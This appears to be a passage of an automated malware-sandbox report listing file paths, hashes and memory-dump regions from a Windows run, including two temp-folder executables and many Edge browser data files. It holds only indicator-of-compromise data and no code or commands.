SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe

MD5 06e18c759e9db948d74c9bf3578417bd
SHA1 78d60f4f88d81703e4575eeec33b73aea2476366
SHA256 a89af642fe7ceb411d55034ebe2522b273c1d6a83cf8b09916db0aad1e68b384
SHA512 4c1bc937dc2958020941e472341d8936a2f50472beb320724f28bc0422769e34af5d01a0f912b936b232d275fdd8192bc945c4c244b44dfbd9c666fe7573ec86

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe

MD5 06e18c759e9db948d74c9bf3578417bd
SHA1 78d60f4f88d81703e4575eeec33b73aea2476366
SHA256 a89af642fe7ceb411d55034ebe2522b273c1d6a83cf8b09916db0aad1e68b384
SHA512 4c1bc937dc2958020941e472341d8936a2f50472beb320724f28bc0422769e34af5d01a0f912b936b232d275fdd8192bc945c4c244b44dfbd9c666fe7573ec86

memory/3944-50-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3944-51-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3944-52-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3944-54-0x0000000000400000-0x0000000000433000-memory.dmp

memory/4432-58-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ml67CK.exe

MD5 b938034561ab089d7047093d46deea8f
SHA1 d778c32cc46be09b107fa47cf3505ba5b748853d
SHA256 260784b1afd8b819cb6ccb91f01090942375e527abdc060dd835992d88c04161
SHA512 4909585c112fba3575e07428679fd7add07453e11169f33922faca2012d8e8fa6dfb763d991c68d3b4bbc6e78b6f37d2380c502daada325d73c7fff6c647769b

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ml67CK.exe

MD5 b938034561ab089d7047093d46deea8f
SHA1 d778c32cc46be09b107fa47cf3505ba5b748853d
SHA256 260784b1afd8b819cb6ccb91f01090942375e527abdc060dd835992d88c04161
SHA512 4909585c112fba3575e07428679fd7add07453e11169f33922faca2012d8e8fa6dfb763d991c68d3b4bbc6e78b6f37d2380c502daada325d73c7fff6c647769b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

\??\pipe\LOCAL\crashpad_3672_TTUBGKEGJNTFQAKP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

\??\pipe\LOCAL\crashpad_4616_OMFUPKSODNZXRARA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

\??\pipe\LOCAL\crashpad_2556_OHXUCIKUGTSKFPQL

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_2888_HFZGACXGYHSRDMVV

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_2304_QVZEDKNXHKCNMBSJ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_3336_ZMDFEZGNNUXZEQPP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

\??\pipe\LOCAL\crashpad_2576_YDMMHSKXCLAYRTHB

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 783bb23744fb0275b17a92f6370f2a3b
SHA1 56e5c5cb36fe40faa7b4e1ee7f46199bdf137b76
SHA256 547cdcd657448f6d29de4eeb6e1148f51c39dc15f054947e204f1e5d0197146c
SHA512 b16762f9eb51ac9f1a3a00c6364f90ba4c96c96b0f95201efd7f70c491a36d3047001f15a90e37f0ea57b3412593027ef76ff5b3e222bc6e26e864dbdd087ab1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 783bb23744fb0275b17a92f6370f2a3b
SHA1 56e5c5cb36fe40faa7b4e1ee7f46199bdf137b76
SHA256 547cdcd657448f6d29de4eeb6e1148f51c39dc15f054947e204f1e5d0197146c
SHA512 b16762f9eb51ac9f1a3a00c6364f90ba4c96c96b0f95201efd7f70c491a36d3047001f15a90e37f0ea57b3412593027ef76ff5b3e222bc6e26e864dbdd087ab1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\40cbd145-80a6-4bd7-b930-4e58d1308cab.tmp

MD5 fe6084643485c9f9ac115006eb5a5779
SHA1 d64e2f2a1b73a13826297b1c7622a5f94b839fb2
SHA256 815149cc624b7fa651b5c1c991a72d9f0ab1ddaa2d804b7428e98027509fc5cf
SHA512 e40a0a5fcb61163253faaa7bcf5f77db61b4a2c62f6c5e00390507328309faa96c7d4740bb12f12d33bd97a34668f376312a7ed800cca6b517a2f00dc87a455e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\f9b440be-7da2-4808-8c67-d302ab4f8251.tmp

MD5 293624435a3edae37d32bade3222a1c5
SHA1 912d705dfa42408e0a2f0d8dff68ab2647326210
SHA256 4da05ec0f097d09304239b64aed7b3407f46da427fab303231b17d01bc3772c7
SHA512 4a3254a0bbce35aa2155eeb8ac2f1938da624fe8a6b57c085f4274155ec786800077384b3cadc62a54c453b1c042fca78e9b7acade88458b4846aad244ef088b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 853623ae45c87ce4bcce94eda59d2ecc
SHA1 3b40ddbc0fa436493794ca6c0f42b502e5d517fe
SHA256 e4afa8afc1827c8e7533f19841843a957c578755e01cbaf89bf2ba4dfd7d244e
SHA512 3517766311f024a1d043f3d47f8e6336e85b24612a01126404a2efb9bd330ea1f45bb7acc369ec67e2a1ba3055cd22dc825d0d2017f02714678c9d6aa77288c9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6dd843529032e20b6d5404c649722d25
SHA1 ed1642dfee208aa0c5ff2ed2c5e8f2ecbe1b310c
SHA256 04c7167e671b0eb07bc5d45c69e273da3085356754e69dcccdc4bfe923292b50
SHA512 a302eacf3461bae7b8f5bf7a7be60f08aefe79d5505653e7015d8e0e63b6dbf68cf8c2eb5e13454d58530f04b9a4925fc7b7c38846d1e3518d92b0057798a4bf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\d7ce29ab-1581-4d35-9966-11837dbab5e0.tmp

MD5 b01550d3a73b39aeb221de9c9ad9ebc8
SHA1 53bce4353847748b87206408db069b9e2adc99f2
SHA256 11f8272de46fcf87222fd99fa157ca7935a2982fa05a85602602edfa0b3661da
SHA512 a66fa182c1f67c59ad215d1ac6e2126ff182ff25314a61eaf55095581d9ef192605139f2756ab3f418a46f9f7ec54f2e232d91414648708827354ffbc498e61e

\??\pipe\LOCAL\crashpad_3940_SDDBYIWSQMIKWTCN

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 65eba75feeb4eee58bf684ca98aecc6c
SHA1 4c66581d0e8e5a6548a006bab3a34109b2da7719
SHA256 ac14dd92c567977ee44a3d950ba9d97da63db034f0ed203ea0ae408cb8c72071
SHA512 04199d5f5dfb57739f6477d3fe5d28782b423e2b70b290d5e8e53697f8273cc41e47d578f9481332adfa26db757203ca9d0b33efacc7045dfbdf4c5ce91adf54

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 293624435a3edae37d32bade3222a1c5
SHA1 912d705dfa42408e0a2f0d8dff68ab2647326210
SHA256 4da05ec0f097d09304239b64aed7b3407f46da427fab303231b17d01bc3772c7
SHA512 4a3254a0bbce35aa2155eeb8ac2f1938da624fe8a6b57c085f4274155ec786800077384b3cadc62a54c453b1c042fca78e9b7acade88458b4846aad244ef088b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0008087d5156aad361251207f4476c61
SHA1 66dd8ff24b94a140bb2f3897cfa4fa5fb3ca0182
SHA256 045bf93f7ba654f298dc4766be7144b81cdd3549a823b906d2beed3665ff16fd
SHA512 c6dff59c173615cdc258569b47ecb0e20bf18a5c7c732beed7e478eb82962e6f22d95b5acddab0fd4fb9a70eef27a160d849fc1954c6bd20484b70b54907bf2c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b01550d3a73b39aeb221de9c9ad9ebc8
SHA1 53bce4353847748b87206408db069b9e2adc99f2
SHA256 11f8272de46fcf87222fd99fa157ca7935a2982fa05a85602602edfa0b3661da
SHA512 a66fa182c1f67c59ad215d1ac6e2126ff182ff25314a61eaf55095581d9ef192605139f2756ab3f418a46f9f7ec54f2e232d91414648708827354ffbc498e61e

\??\pipe\LOCAL\crashpad_4384_SSKSUHODILBRPBAV

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ed408941-f6bb-47c1-b885-ca572267dfa9.tmp

MD5 0008087d5156aad361251207f4476c61
SHA1 66dd8ff24b94a140bb2f3897cfa4fa5fb3ca0182
SHA256 045bf93f7ba654f298dc4766be7144b81cdd3549a823b906d2beed3665ff16fd
SHA512 c6dff59c173615cdc258569b47ecb0e20bf18a5c7c732beed7e478eb82962e6f22d95b5acddab0fd4fb9a70eef27a160d849fc1954c6bd20484b70b54907bf2c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 76d067c6301267d3933e46c84fa19fd3
SHA1 d882755e67ae37fdb2baa430cf68f2001760cf0c
SHA256 c14dba6cffa76a3e28e5491bfc7b5ab855589d5481c6d67f8eb580210184d935
SHA512 db40ce1c044f2b9d3d045d6fb4d6ade7f4be7c91ba3635188971d7ab9f9cfc99af1007955060d26f54cfd0f4f037a7260f21dd45551accb817f4b508d2d09e27

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\c387e36c-f530-445e-a632-9beec1708337.tmp

MD5 65eba75feeb4eee58bf684ca98aecc6c
SHA1 4c66581d0e8e5a6548a006bab3a34109b2da7719
SHA256 ac14dd92c567977ee44a3d950ba9d97da63db034f0ed203ea0ae408cb8c72071
SHA512 04199d5f5dfb57739f6477d3fe5d28782b423e2b70b290d5e8e53697f8273cc41e47d578f9481332adfa26db757203ca9d0b33efacc7045dfbdf4c5ce91adf54

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 76d067c6301267d3933e46c84fa19fd3
SHA1 d882755e67ae37fdb2baa430cf68f2001760cf0c
SHA256 c14dba6cffa76a3e28e5491bfc7b5ab855589d5481c6d67f8eb580210184d935
SHA512 db40ce1c044f2b9d3d045d6fb4d6ade7f4be7c91ba3635188971d7ab9f9cfc99af1007955060d26f54cfd0f4f037a7260f21dd45551accb817f4b508d2d09e27

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 853623ae45c87ce4bcce94eda59d2ecc
SHA1 3b40ddbc0fa436493794ca6c0f42b502e5d517fe
SHA256 e4afa8afc1827c8e7533f19841843a957c578755e01cbaf89bf2ba4dfd7d244e
SHA512 3517766311f024a1d043f3d47f8e6336e85b24612a01126404a2efb9bd330ea1f45bb7acc369ec67e2a1ba3055cd22dc825d0d2017f02714678c9d6aa77288c9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6dd843529032e20b6d5404c649722d25
SHA1 ed1642dfee208aa0c5ff2ed2c5e8f2ecbe1b310c
SHA256 04c7167e671b0eb07bc5d45c69e273da3085356754e69dcccdc4bfe923292b50
SHA512 a302eacf3461bae7b8f5bf7a7be60f08aefe79d5505653e7015d8e0e63b6dbf68cf8c2eb5e13454d58530f04b9a4925fc7b7c38846d1e3518d92b0057798a4bf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 fe6084643485c9f9ac115006eb5a5779
SHA1 d64e2f2a1b73a13826297b1c7622a5f94b839fb2
SHA256 815149cc624b7fa651b5c1c991a72d9f0ab1ddaa2d804b7428e98027509fc5cf
SHA512 e40a0a5fcb61163253faaa7bcf5f77db61b4a2c62f6c5e00390507328309faa96c7d4740bb12f12d33bd97a34668f376312a7ed800cca6b517a2f00dc87a455e

memory/3392-345-0x0000000003100000-0x0000000003116000-memory.dmp

memory/4432-348-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 40b360dec6428cc57e4b749cf4880445
SHA1 a57337dacbdd90c874063ec66bdc4360edbcd2a7
SHA256 608e7fce9ac9b00415ddc955cd459f0b8005392834bd8d622e2ec416da1c9e38
SHA512 7769bf69a86bdf09183abed2c544909a9d802f6892bcc2b74a6f5aaecabb67f9f67a7ac75f392afcfb685add8b0ada52becfc55542ca6a19459681484b67e9f9

memory/8444-375-0x0000000000400000-0x000000000043C000-memory.dmp

memory/8444-384-0x00000000744A0000-0x0000000074C50000-memory.dmp

memory/8444-385-0x0000000007F10000-0x00000000084B4000-memory.dmp

